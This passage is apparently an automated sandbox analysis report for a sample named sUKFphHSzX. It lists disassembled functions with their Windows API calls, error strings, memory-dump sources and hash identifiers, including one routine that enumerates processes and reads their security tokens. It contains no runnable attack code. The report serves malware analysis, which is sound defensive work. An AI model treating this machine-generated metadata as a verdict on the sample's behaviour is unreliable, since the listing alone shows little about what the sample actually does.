Function 0000020933587340 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000209335781FC: GetLastError.KERNEL32 ref: 000002093357820B
Part of subcall function 00000209335781FC: FlsGetValue.KERNEL32 ref: 0000020933578220
Part of subcall function 00000209335781FC: SetLastError.KERNEL32 ref: 00000209335782AB

EnumSystemLocalesW.KERNEL32 ref: 00000209335873BE

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
Instruction ID: b68c3ba735ccda4d30b7f08c662eb09d511cd6f31a4b7d7406506c2f5d5127c8
Opcode Fuzzy Hash: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
Instruction Fuzzy Hash: 6801D47275479086E7104F16E4C979DB6E1E7C0BA4F45C361FA6A4B2C7CB7488C1CB01

Function 000002093354F1BE Relevance: 1.5, APIs: 1, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 000002093354F1FD
CoSetProxyBlanket.OLE32 ref: 000002093354F252

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: BlanketCreateInstanceProxy
String ID:
API String ID: 1899829610-0
Opcode ID: bcdeeb919fc726a7b79d0c79078a817d1623687a02b5914ef7f227b6661b9152
Instruction ID: 44fa907d9a6d7bd4052562b819ccdca7256edd346a9ff726f5e3ed72f20ae9ae
Opcode Fuzzy Hash: bcdeeb919fc726a7b79d0c79078a817d1623687a02b5914ef7f227b6661b9152
Instruction Fuzzy Hash: 4401D623744B4086FB25DB68F4443AE63B1A7C8758F0042929E4E43A57DF38C1C5CB44

Function 000002093357BC68 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32 ref: 000002093357BCB7

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
Instruction ID: 1dfade2dcfed03e8585704befa09281eb3ef05b34624fb192ab0d6c46d510a8e
Opcode Fuzzy Hash: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
Instruction Fuzzy Hash: D6F08C72340B4092E700CB25F8CA2993765F7C9BC0F24D065EA4A8336BCE38C4908B40

Function 0000020933576718 Relevance: 1.5, APIs: 1, Instructions: 28timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002093357672C

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: aa8c88728e75ab677f25ee3ee359a5c354dffbd2d49f8684b78d8275cd561a6c
Instruction ID: 8d383420a78eb12cc1fe86bc78d4f37462529528bf391105b799de6787e3000e
Opcode Fuzzy Hash: aa8c88728e75ab677f25ee3ee359a5c354dffbd2d49f8684b78d8275cd561a6c
Instruction Fuzzy Hash: 38F0A7E5B29B8843EE188759E4543949292AB9CBF0F049321BD7E4E7DBFA1CD5508740

Function 00000209335B2008 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf89ee08abfafef11d6836cff015bf33f46ce59e37d2109c0e180f958d00be6
Instruction ID: 01fdadabb296ba3a2245c5169d8a1a91c97dbf6435917fd07b94e518ec5b3aba
Opcode Fuzzy Hash: aaf89ee08abfafef11d6836cff015bf33f46ce59e37d2109c0e180f958d00be6
Instruction Fuzzy Hash: E1316BA798EBC84AF3574B741CAE1182FE0A7D6E50F4DC0CBD286876D7E0494845C772

Function 00000209335B26D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56010080051de17300058729e59d266e581a5b7310649d3cd09ec315fb808e17
Instruction ID: a291ee1484f13f9a225d684c6e5b47c0c04061d15fb03a2e14a70c74635f6233
Opcode Fuzzy Hash: 56010080051de17300058729e59d266e581a5b7310649d3cd09ec315fb808e17
Instruction Fuzzy Hash: 9BC0124350E6DC06F257CB1C44CE58D6F609751654F38909AD35907293D80308C647E2

Function 00000209335B24E8 Relevance: .0, Instructions: 5COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23083de8f6e29486cf13e86b080568779141a077f322457c50da5c8b369ac149
Instruction ID: 7ec34ff438e086a7bb4e48d8351c880c834af77671629c9e4b9de442d4d2a017
Opcode Fuzzy Hash: 23083de8f6e29486cf13e86b080568779141a077f322457c50da5c8b369ac149
Instruction Fuzzy Hash: DAB0923384C7E4DAE35B1E245CA88382A81A6A2E04B1D4989C6881649B925C8805C6A6

Function 00000209335B22D8 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b49754a3bf438b94065322fccf8bb36126680b767eeab48c7b69233c843a4aa
Instruction ID: 5637a91258ff32da7623171f556a13c66519ea2643dabb2e399fefbb38acb267
Opcode Fuzzy Hash: 7b49754a3bf438b94065322fccf8bb36126680b767eeab48c7b69233c843a4aa
Instruction Fuzzy Hash:

Function 00000209335B26E0 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220f0d61c72bdc44b6b7d168d579482ee12a7c0673a1fe1f1162659f788f9bf3
Instruction ID: 74165340ca7a8aa812658eb8cabae270aa7b3f510efe0db7868beeaf91d2919c
Opcode Fuzzy Hash: 220f0d61c72bdc44b6b7d168d579482ee12a7c0673a1fe1f1162659f788f9bf3
Instruction Fuzzy Hash:

Function 00007FF6CFA3DF80 Relevance: 35.0, APIs: 10, Strings: 10, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E0E7
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E0F4
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E101
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E10E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E11B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E128
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E135
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E142
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E14F
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3E15C

Strings

Zero modifier requires an arithmetic or pointer presentation type, xrefs: 00007FF6CFA3E148
Invalid presentation type for bool, xrefs: 00007FF6CFA3E0ED
Invalid presentation type for floating-point, xrefs: 00007FF6CFA3E114
Invalid presentation type for integer, xrefs: 00007FF6CFA3E107
Invalid presentation type for string, xrefs: 00007FF6CFA3E121
Hash/sign modifier requires an arithmetic presentation type, xrefs: 00007FF6CFA3E13B
Invalid presentation type for pointer, xrefs: 00007FF6CFA3E12E
Invalid type specification., xrefs: 00007FF6CFA3E0E0
Invalid presentation type for char, xrefs: 00007FF6CFA3E0FA
Invalid presentation type specifier, xrefs: 00007FF6CFA3E155

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for char$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
API String ID: 909987262-3157939077
Opcode ID: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
Instruction ID: 71ad54fc73de90aecf6334eb48ac9d0a8cceca721adfd2171ce7cb2f82c96ced
Opcode Fuzzy Hash: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
Instruction Fuzzy Hash: 69110A30A1840695F915AF54E8AA9F963B1AF90316FD10831D39DC3AB6DD1CF90CC320

Function 000002093354ED30 Relevance: 28.7, APIs: 19, Instructions: 177processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000002093354ED86
Process32FirstW.KERNEL32 ref: 000002093354EDCA
Process32NextW.KERNEL32 ref: 000002093354EDDF
OpenProcess.KERNEL32 ref: 000002093354EE1B
OpenProcessToken.ADVAPI32 ref: 000002093354EE42
GetTokenInformation.ADVAPI32 ref: 000002093354EE6E
GetLastError.KERNEL32 ref: 000002093354EE7C
GetTokenInformation.ADVAPI32 ref: 000002093354EEBC
ConvertSidToStringSidA.ADVAPI32 ref: 000002093354EED3
CloseHandle.KERNEL32 ref: 000002093354EF46
CloseHandle.KERNEL32 ref: 000002093354EF51
CloseHandle.KERNEL32 ref: 000002093354EFB6
Process32NextW.KERNEL32 ref: 000002093354EFC3
CloseHandle.KERNEL32 ref: 000002093354EFE9
CloseHandle.KERNEL32 ref: 000002093354EFF2
CloseHandle.KERNEL32 ref: 000002093354F007

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
String ID:
API String ID: 3925315391-0
Opcode ID: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
Instruction ID: d6b66d413e5bad0fe1e29018d4e70adf43436af0f51abb0d12713bc252d8c239
Opcode Fuzzy Hash: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
Instruction Fuzzy Hash: 1A816132295B8096E7548B15E88835EA3A5F7C8BD4F408155FE4E47BABDF78C485CB40

Function 00007FF6CFA3DBD0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 263COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF1D
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF2A
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF37
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF44
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF51
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF5E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF6B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3DF78

Strings

Invalid fill (too long)., xrefs: 00007FF6CFA3DF23
invalid fill character '{', xrefs: 00007FF6CFA3DF16
Precision not allowed for this argument type., xrefs: 00007FF6CFA3DF3D
Format specifier requires numeric argument., xrefs: 00007FF6CFA3DF64
Invalid format string., xrefs: 00007FF6CFA3DF71
Missing precision specifier., xrefs: 00007FF6CFA3DF57
Number is too big, xrefs: 00007FF6CFA3DF4A
Format specifier requires numeric or pointer argument., xrefs: 00007FF6CFA3DF30

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid fill (too long).$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.$invalid fill character '{'
API String ID: 909987262-1289275417
Opcode ID: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
Instruction ID: 17426ae899c843e74af4445c3f828bf1e15202e37c64039ea8ebcc7071f353d5
Opcode Fuzzy Hash: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
Instruction Fuzzy Hash: 6FA12C6AA0C6DAC5FE60DF64C0543B9BBA19B51B82F498431D6CD877D1CE6CE48AC330

Function 00007FF6CFA3CAE0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 257COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE3F
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE4C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE59
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE66
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE73
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE80
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3CE8D

Strings

Can not switch from manual to automatic indexing, xrefs: 00007FF6CFA3CE5F
Missing '}' in format string., xrefs: 00007FF6CFA3CE79, 00007FF6CFA3CE86
Unknown format specifier., xrefs: 00007FF6CFA3CE6C
Invalid format string., xrefs: 00007FF6CFA3CE38
Number is too big, xrefs: 00007FF6CFA3CE52
Can not switch from automatic to manual indexing, xrefs: 00007FF6CFA3CE45

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
API String ID: 909987262-3302395901
Opcode ID: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
Instruction ID: 05f924dab858ac4750cbcb074f200d85ce25d01953ca6ebbb480e4803b59cad6
Opcode Fuzzy Hash: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
Instruction Fuzzy Hash: CBB1A232B48A45DAEB208FB4D8502BDB3F1AB18789F544232DBCD93695DE3CE199C350

Function 00007FF6CFA509FC Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6CFA50A0B
FlsGetValue.KERNEL32 ref: 00007FF6CFA50A20
FlsSetValue.KERNEL32 ref: 00007FF6CFA50A41
FlsSetValue.KERNEL32 ref: 00007FF6CFA50A6E
FlsSetValue.KERNEL32 ref: 00007FF6CFA50A7F
FlsSetValue.KERNEL32 ref: 00007FF6CFA50A90
SetLastError.KERNEL32 ref: 00007FF6CFA50AAB
FlsGetValue.KERNEL32 ref: 00007FF6CFA50AE1
FlsSetValue.KERNEL32 ref: 00007FF6CFA50B00

Part of subcall function 00007FF6CFA504DC: HeapAlloc.KERNEL32(?,?,00000000,00007FF6CFA50BD6,?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000), ref: 00007FF6CFA50531

FlsSetValue.KERNEL32 ref: 00007FF6CFA50B28

Part of subcall function 00007FF6CFA50554: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6CFA50C21,?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000), ref: 00007FF6CFA5056A
Part of subcall function 00007FF6CFA50554: GetLastError.KERNEL32(?,?,00000000,00007FF6CFA50C21,?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000), ref: 00007FF6CFA50574

FlsSetValue.KERNEL32 ref: 00007FF6CFA50B39
FlsSetValue.KERNEL32 ref: 00007FF6CFA50B4A

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
Instruction ID: 4102b820e2c348720519a8664d69c036a4862f3f65232fa24f8553543805124f
Opcode Fuzzy Hash: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
Instruction Fuzzy Hash: CE418114B1DA03C5FA696FF268A107AB3915F44776F148B38DABFC76C6DD2CB4418620

Function 00000209335781FC Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002093357820B
FlsGetValue.KERNEL32 ref: 0000020933578220
FlsSetValue.KERNEL32 ref: 0000020933578241
FlsSetValue.KERNEL32 ref: 000002093357826E
FlsSetValue.KERNEL32 ref: 000002093357827F
FlsSetValue.KERNEL32 ref: 0000020933578290
SetLastError.KERNEL32 ref: 00000209335782AB
FlsGetValue.KERNEL32 ref: 00000209335782E1
FlsSetValue.KERNEL32 ref: 0000020933578300

Part of subcall function 000002093357BBB8: HeapAlloc.KERNEL32 ref: 000002093357BC0D

FlsSetValue.KERNEL32 ref: 0000020933578328

Part of subcall function 000002093357B550: HeapFree.KERNEL32 ref: 000002093357B566
Part of subcall function 000002093357B550: GetLastError.KERNEL32 ref: 000002093357B570

FlsSetValue.KERNEL32 ref: 0000020933578339
FlsSetValue.KERNEL32 ref: 000002093357834A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 36390ee60d7853b2b61aae55913fe849076646fcf7fe757753152af4f23a704c
Instruction ID: b632a92fcba4f44f63adb0f4e3dd287b26c86a66f512f8c37fd07a0acf844ad9
Opcode Fuzzy Hash: 36390ee60d7853b2b61aae55913fe849076646fcf7fe757753152af4f23a704c
Instruction Fuzzy Hash: 59415B203C470046FA68A77699EF36D22925BC57B6F18CBE4B93F466D7EE2894C14F40

Function 00007FF6CFA316C0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6CFA316FD
RtlImageNtHeader.NTDLL ref: 00007FF6CFA3171D
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA3177A
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA317B7
RtlImageNtHeader.NTDLL ref: 00007FF6CFA31822
RtlImageNtHeader.NTDLL ref: 00007FF6CFA3187B
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA31914

Strings

.data, xrefs: 00007FF6CFA3170A
ntdll.dll, xrefs: 00007FF6CFA316F3
.mrdata, xrefs: 00007FF6CFA317D6

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: HeaderImageNumbersVersion$HandleModule
String ID: .data$.mrdata$ntdll.dll
API String ID: 389246363-825320017
Opcode ID: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
Instruction ID: 7b10daf65c7947286bad16893ce9c46cc4d340c4372a478067f5f323eec4e7a6
Opcode Fuzzy Hash: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
Instruction Fuzzy Hash: E7914772F05A41C9EB50CFA1D8442ACB7B4BB08B49F460536CE99A7B58DF38E549C760

Function 00007FF6CFA3FAE0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3FC44
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3FC51
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3FC5E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3FC6B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3FC78

Strings

Can not switch from manual to automatic indexing, xrefs: 00007FF6CFA3FC71
Precision not allowed for this argument type., xrefs: 00007FF6CFA3FC3D
Invalid format string., xrefs: 00007FF6CFA3FC64
Number is too big, xrefs: 00007FF6CFA3FC57
Can not switch from automatic to manual indexing, xrefs: 00007FF6CFA3FC4A

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
API String ID: 909987262-435359029
Opcode ID: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
Instruction ID: 92627bfe41f790a18c884d9f667df6a3bdadf60d40ea705760bdce26ebb65b6d
Opcode Fuzzy Hash: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
Instruction Fuzzy Hash: 24413922A1C989C6EA28CF68D0612B9B3B1EF54742F804132D7DDC36E1DF2CE599C310

Function 000002093356FDCC Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093356FDFB
_invalid_parameter_noinfo.LIBCMT ref: 000002093356FECB

Strings

0, xrefs: 000002093356FF07
0, xrefs: 000002093356FE9D
0, xrefs: 000002093356FEF5

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0
API String ID: 3215553584-3137946472
Opcode ID: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
Instruction ID: 057717b9bde5d3d011e2acc385fa31e4280d212c656ca3d352e6f2ee7851fca2
Opcode Fuzzy Hash: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
Instruction Fuzzy Hash: E0E1D13358579589F7608F28C4D83AD7BD5A392B84F94D192F68E87793C639C8DACB00

Function 00007FF6CFA32B10 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6CFA32B8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6CFA32BD5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA32D51
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA32D64
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA32D6A

Strings

true, xrefs: 00007FF6CFA32C8C
bad locale name, xrefs: 00007FF6CFA32D57
false, xrefs: 00007FF6CFA32C5D

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
